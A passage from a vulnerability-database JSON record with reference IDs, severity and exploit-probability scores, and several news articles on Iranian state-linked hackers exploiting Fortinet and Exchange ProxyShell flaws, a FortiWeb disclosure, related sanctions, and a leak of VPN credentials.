"AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-117A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-040A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "AA23-263A", "AA23-270A", "AA23-278A", "AA23-284A", "AA23-289A", "AA23-319A", "AA23-320A", "AA23-325A", "AA23-335A", "AA23-339A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:6CF60AA98AC32EEEED1A25871823E90D"]}, {"type": "kaspersky", "idList": ["KLA12224"]}, {"type": "kitploit", "idList": ["KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:335640D886EC822FE646F8A943770825", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:44699410831936C9D0A5C048B00776EE", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:F629837C88B5435ECA8E80D0F01621BA"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-GATHER-ADOBE_COLDFUSION_FILEREAD_CVE_2023_26360-", "MSF:EXPLOIT-MULTI-HTTP-ADOBE_COLDFUSION_RCE_CVE_2023_26360-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "mscve", "idList": ["MS:CVE-2021-34473"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "msrc", "idList": ["MSRC:8F98074A1D86F9B965ADC16597E286ED", "MSRC:C28CD823FBB321014DB6D53A28DA0CD1"]}, {"type": "mssecure", "idList": ["MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "nessus", "idList": ["COLDFUSION_WIN_APSB23-25.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FORTIOS_FG-IR-19-037.NASL", "FORTIOS_FG-IR-19-283.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL"]}, {"type": "nuclei", "idList": ["NUCLEI:CVE-2018-13379", "NUCLEI:CVE-2021-34473", "NUCLEI:CVE-2023-26360"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:163895", "PACKETSTORM:172079"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446"]}, {"type": "prion", "idList": ["PRION:CVE-2018-13379", "PRION:CVE-2019-5591", "PRION:CVE-2020-12812", "PRION:CVE-2021-31196", "PRION:CVE-2021-31206", "PRION:CVE-2021-34473", "PRION:CVE-2023-26360"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:7B5CCC9A0ADE13140C03A708CCBB4C4A", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:907F758757E4F4DFA2ED45E5B6AAC01E", "RAPID7BLOG:9D5A16A43EFEA30A49E1E70FD568C548", "RAPID7BLOG:AF89E3740FB97329034E56BA6E181ABB", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720"]}, {"type": "securelist", "idList": ["SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "talosblog", "idList": ["TALOSBLOG:18E1939F4F4AB01928AE1BD2B39FD681"]}, {"type": "thn", "idList": ["THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3474CD6C25ADD60FF37EDC1774311111", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:63560DA43FB5804E3B258BC62E210EC4", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:878B3321978CDB69F46C7A415B46701B", "THN:8BA951AD00E17C72D6321234DBF80D19", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:934BF6B94312FDB8317CCD9F5E46677C", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:D10C2C7FC285D13E18415150A4507AB6", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:F25FAD25E15EBBE4934883ABF480294D", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496"]}, {"type": "trellix", "idList": ["TRELLIX:21227249912602DD6E11D3B19898A7FF"]}, {"type": "zdi", "idList": ["ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-36667", "1337DAY-ID-38634"]}]}, "score": {"value": 9.8, "vector": "NONE"}, "epss": [{"cve": "CVE-2018-13379", "epss": 0.97505, "percentile": 0.99963, "modified": "2023-05-02"}, {"cve": "CVE-2019-5591", "epss": 0.00234, "percentile": 0.59971, "modified": "2023-05-02"}, {"cve": "CVE-2020-12812", "epss": 0.00687, "percentile": 0.77167, "modified": "2023-05-01"}, {"cve": "CVE-2021-34473", "epss": 0.97375, "percentile": 0.99825, "modified": "2023-05-01"}], "vulnersScore": 9.8}, "_state": {"dependencies": 1701891669, "score": 1701892172, "epss": 0}, "_internal": {"score_hash": "29fd77029ee17d1d9f3872d089c0ce46"}}

{"thn": [{"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW>)\n\nCybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. The list of flaws being exploited are below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending organizations to immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:13", "description": "[](<https://thehackernews.com/images/-iRDFz4kb2_c/YRyAnCXcgbI/AAAAAAAADjw/9zUdSCDaZ3wAdT6A32p1ugpUnmn7m6WagCLcBGAsYHQ/s0/Fortinet-zero-day.jpg>)\n\nDetails have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. \"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n**_Update: _**Fortinet shared the following statement with The Hacker News:\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of our 90-day Responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window. We are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week.\u201d\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T03:41:00", "type": "thn", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T06:50:20", "id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "href": "https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjUqmffIx48KtQdHxTXb4TQfvElel4yvoLc_Uq-nF3atp_DnKXEvX_r4s4FR-V9kItxokvkUgH3L-QP1uH3JrII_VtRNnXYXU3EYxwsreIbOgCkHKHN4AbWxtUPY5tKaH8u6YvYBd2oA_JReHSU1gNdaKY11tzzrlCHhUSTJzZr4yGRgnN-fUCAb2Mv/s728-e100/iranian-hackers.jpg>)\n\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) has revealed the group's connections to two companies Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and IRGC remain unclear, the method of private Iranian firms acting as fronts or providing support for intelligence operations is well established over the years, including that of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T08:35:28", "description": "[](<https://thehackernews.com/images/-05Y4azfOtHY/YTmz5X6CzVI/AAAAAAAADwU/FmcJruB5qJM-D9XZtYFV-FPRYfwHpYpHwCLcBGAsYHQ/s0/vpng.jpg>)\n\nNetwork security solutions provider Fortinet confirmed that a malicious actor had unauthorizedly disclosed VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices.\n\n\"These credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>) at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable,\" the company 